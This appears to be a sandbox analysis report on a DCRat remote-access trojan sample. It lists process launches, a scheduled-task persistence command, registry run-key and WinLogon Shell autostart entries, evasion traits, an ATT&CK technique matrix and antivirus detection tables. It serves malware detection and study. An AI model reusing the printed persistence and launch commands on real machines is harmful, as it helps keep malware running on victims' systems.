                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7296Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 7384Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 7400Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 7832Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe TID: 8060Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe TID: 8144Thread sleep time: -922337203685477s >= -30000s
                                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeFile Volume queried: C:\ FullSizeInformation
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDA69B FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00BDA69B
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEC220 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00BEC220
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEE6A3 VirtualQuery,GetSystemInfo,0_2_00BEE6A3
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: w32tm.exe, 00000022.00000002.1899837079.000001F7926E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                                    Source: 7aHY4r6vXR.exe, 00000000.00000003.1740731841.000000000360B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                    Source: wscript.exe, 00000001.00000003.1793236904.0000000002B0D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d.
                                    Source: wscript.exe, 00000001.00000002.1794697213.0000000002AEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                                    Source: RuntimeBroker.exe.4.drBinary or memory string: kb9aSsbBD97JTVMcIoeR
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeAPI call chain: ExitProcess graph end nodegraph_0-23666
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BEF838
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF7DEE mov eax, dword ptr fs:[00000030h]0_2_00BF7DEE
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BFC030 GetProcessHeap,0_2_00BFC030
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: Debug
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: Debug
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeProcess token adjusted: Debug
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeProcess token adjusted: Debug
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF9D5 SetUnhandledExceptionFilter,0_2_00BEF9D5
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BEFBCA
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BF8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BF8EBD
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe"
                                    Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainBroker\IrbV6YakyWCvQIuALcoa2IhBwWZ19ItpwUlqov7vyFBfFx5s16nM.bat" "
                                    Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\ChainBroker\bridgeServerFontSavesMonitor.exe "C:\ChainBroker/bridgeServerFontSavesMonitor.exe"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\axeflxig\axeflxig.cmdline"
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "bridgeServerFontSavesMonitorb" /sc MINUTE /mo 9 /tr "'C:\ChainBroker\bridgeServerFontSavesMonitor.exe'" /f
                                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES69DB.tmp" "c:\Windows\System32\CSCAAFDA77B4B0340CF902F598B7E2DA6.TMP"
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEF654 cpuid 0_2_00BEF654
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00BEAF0F
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformationJump to behavior
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\ChainBroker\bridgeServerFontSavesMonitor.exeQueries volume information: C:\ChainBroker\bridgeServerFontSavesMonitor.exe VolumeInformation
                                    Source: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exeQueries volume information: C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe VolumeInformation
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BEDF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,0_2_00BEDF1E
                                    Source: C:\Users\user\Desktop\7aHY4r6vXR.exeCode function: 0_2_00BDB146 GetVersionExW,0_2_00BDB146
                                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                                    Stealing of Sensitive Information

                                    Source: Yara matchFile source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996, type: MEMORYSTR
                                    Source: Yara matchFile source: 7aHY4r6vXR.exe, type: SAMPLE
                                    Source: Yara matchFile source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara matchFile source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara matchFile source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara matchFile source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara matchFile source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED

                                    Remote Access Functionality

                                    Source: Yara match; File source: 00000004.00000002.1854260219.000000001321B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: Process Memory Space: bridgeServerFontSavesMonitor.exe PID: 6996, type: MEMORYSTR
                                    Source: Yara match; File source: 7aHY4r6vXR.exe, type: SAMPLE
                                    Source: Yara match; File source: 4.0.bridgeServerFontSavesMonitor.exe.ca0000.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.7aHY4r6vXR.exe.58ff717.1.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.7aHY4r6vXR.exe.6f66717.0.raw.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.7aHY4r6vXR.exe.58ff717.1.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 0.3.7aHY4r6vXR.exe.6f66717.0.unpack, type: UNPACKEDPE
                                    Source: Yara match; File source: 00000000.00000003.1734834073.0000000006F18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000004.00000000.1794524656.0000000000CA2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
                                    Source: Yara match; File source: 00000000.00000003.1735483300.00000000058B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                    Source: Yara match; File source: C:\Windows\SchCache\RuntimeBroker.exe, type: DROPPED
                                    Source: Yara match; File source: C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe, type: DROPPED
                                    Source: Yara match; File source: C:\ChainBroker\bridgeServerFontSavesMonitor.exe, type: DROPPED
                                    Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                                    Gather Victim Identity Information11
                                    Scripting
                                    Valid Accounts11
                                    Windows Management Instrumentation
                                    1
                                    Scheduled Task/Job
                                    11
                                    Process Injection
                                    141
                                    Masquerading
                                    OS Credential Dumping1
                                    System Time Discovery
                                    1
                                    Taint Shared Content
                                    1
                                    Archive Collected Data
                                    1
                                    Encrypted Channel
                                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                                    CredentialsDomainsDefault Accounts2
                                    Command and Scripting Interpreter
                                    11
                                    Scripting
                                    1
                                    Scheduled Task/Job
                                    1
                                    Disable or Modify Tools
                                    LSASS Memory121
                                    Security Software Discovery
                                    Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
                                    Email AddressesDNS ServerDomain Accounts1
                                    Scheduled Task/Job
                                    31
                                    Registry Run Keys / Startup Folder
                                    31
                                    Registry Run Keys / Startup Folder
                                    31
                                    Virtualization/Sandbox Evasion
                                    Security Account Manager1
                                    Process Discovery
                                    SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
                                    Employee NamesVirtual Private ServerLocal Accounts1
                                    Native API
                                    1
                                    DLL Side-Loading
                                    1
                                    DLL Side-Loading
                                    11
                                    Process Injection
                                    NTDS31
                                    Virtualization/Sandbox Evasion
                                    Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                                    Deobfuscate/Decode Files or Information
                                    LSA Secrets3
                                    File and Directory Discovery
                                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                                    Obfuscated Files or Information
                                    Cached Domain Credentials37
                                    System Information Discovery
                                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                                    Software Packing
                                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                                    DLL Side-Loading
                                    Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                    File Deletion
                                    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                    [Behavior graph: ID 1587305, Sample: 7aHY4r6vXR.exe, Start date: 10/01/2025, Architecture: WINDOWS, Score: 100]

                                    Source | Detection | Scanner | Label | Link
                                    7aHY4r6vXR.exe | 48% | Virustotal | | Browse
                                    7aHY4r6vXR.exe | 66% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    7aHY4r6vXR.exe | 100% | Avira | VBS/Runner.VPG |
                                    7aHY4r6vXR.exe | 100% | Joe Sandbox ML | |

                                    Source | Detection | Scanner | Label | Link
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\ChainBroker\WiJ0Q2cIafyWfcOMJ8mrmlFuDvVbi9nZIDl7gyLiG4eFyDELulT2kNl2MWww.vbe | 100% | Avira | VBS/Runner.VPG |
                                    C:\Users\user\Desktop\ARUSTYfT.log | 100% | Avira | TR/PSW.Agent.qngqt |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Users\user\Desktop\riACjval.log | 100% | Avira | TR/AVI.Agent.updqb |
                                    C:\Users\user\AppData\Local\Temp\FeErzF7oGb.bat | 100% | Avira | BAT/Delbat.C |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\Windows\SchCache\RuntimeBroker.exe | 100% | Avira | HEUR/AGEN.1339906 |
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\hzhmzTUD.log | 100% | Joe Sandbox ML | |
                                    C:\Windows\System32\SecurityHealthSystray.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\user\Desktop\ARUSTYfT.log | 100% | Joe Sandbox ML | |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Joe Sandbox ML | |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 100% | Joe Sandbox ML | |
                                    C:\Windows\SchCache\RuntimeBroker.exe | 100% | Joe Sandbox ML | |
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\ChainBroker\bridgeServerFontSavesMonitor.exe | 60% | Virustotal | | Browse
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\Default\AppData\Local\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe | 60% | Virustotal | | Browse
                                    C:\Users\user\Desktop\ARUSTYfT.log | 71% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\Desktop\ARUSTYfT.log | 69% | Virustotal | | Browse
                                    C:\Users\user\Desktop\VObntHLa.log | 25% | ReversingLabs | |
                                    C:\Users\user\Desktop\VObntHLa.log | 35% | Virustotal | | Browse
                                    C:\Users\user\Desktop\hzhmzTUD.log | 8% | ReversingLabs | |
                                    C:\Users\user\Desktop\hzhmzTUD.log | 11% | Virustotal | | Browse
                                    C:\Users\user\Desktop\riACjval.log | 50% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Windows\SchCache\RuntimeBroker.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe | 83% | ReversingLabs | ByteCode-MSIL.Trojan.DCRat |
                                    No Antivirus matches
                                    No contacted domains info
                                    Name | Source | Malicious | Antivirus Detection | Reputation
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | bridgeServerFontSavesMonitor.exe, 00000004.00000002.1849804431.000000000393F000.00000004.00000800.00020000.00000000.sdmp | false | | high
                                      No contacted IP infos
                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1587305
                                      Start date and time:2025-01-10 05:41:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 8m 51s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:46
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:7aHY4r6vXR.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:ccd01051f9e8bf3301b3bdd406f0bc24.exe
                                      Detection:MAL
                                      Classification:mal100.spre.troj.expl.evad.winEXE@45/29@0/0
                                      EGA Information:
                                      • Successful, ratio: 30%
                                      HCA Information:
                                      • Successful, ratio: 53%
                                      • Number of executed functions: 474
                                      • Number of non-executed functions: 98
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 184.28.90.27, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, 506691cm.renyash.ru, fe3cr.delivery.mp.microsoft.com
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 1748 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 6644 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 7576 because it is empty
                                      • Execution Graph export aborted for target SfLAFHFXIbHzHGgilQgXtKOw.exe, PID 8120 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 7352 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 7364 because it is empty
                                      • Execution Graph export aborted for target bridgeServerFontSavesMonitor.exe, PID 8036 because it is empty
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      Time | Type | Description
                                      04:42:16 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:17 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:17 | Task Scheduler | Run new task: SfLAFHFXIbHzHGgilQgXtKOw path: "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:17 | Task Scheduler | Run new task: SfLAFHFXIbHzHGgilQgXtKOwS path: "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:19 | Task Scheduler | Run new task: bridgeServerFontSavesMonitor path: "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:19 | Task Scheduler | Run new task: bridgeServerFontSavesMonitorb path: "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:19 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:42:35 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:42:43 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:42:52 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:43:00 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:43:08 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run SfLAFHFXIbHzHGgilQgXtKOw "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:16 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run RuntimeBroker "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:43:24 | Autostart | Run: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run bridgeServerFontSavesMonitor "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      04:43:41 | Autostart | Run: WinLogon Shell "C:\Users\Default User\Local Settings\Temp\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:49 | Autostart | Run: WinLogon Shell "C:\Windows\Migration\WTR\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:43:57 | Autostart | Run: WinLogon Shell "C:\Windows\SchCache\RuntimeBroker.exe"
                                      04:44:05 | Autostart | Run: WinLogon Shell "C:\Windows\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:44:13 | Autostart | Run: WinLogon Shell "C:\Users\user\SfLAFHFXIbHzHGgilQgXtKOw.exe"
                                      04:44:21 | Autostart | Run: WinLogon Shell "C:\ChainBroker\bridgeServerFontSavesMonitor.exe"
                                      No context
                                      Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                      C:\Users\user\Desktop\ARUSTYfT.log | 0V2JsCrGUB.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
                                       | PlZA6b48MW.exe | Get hash | malicious | DCRat, PureLog Stealer, zgRAT | Browse |
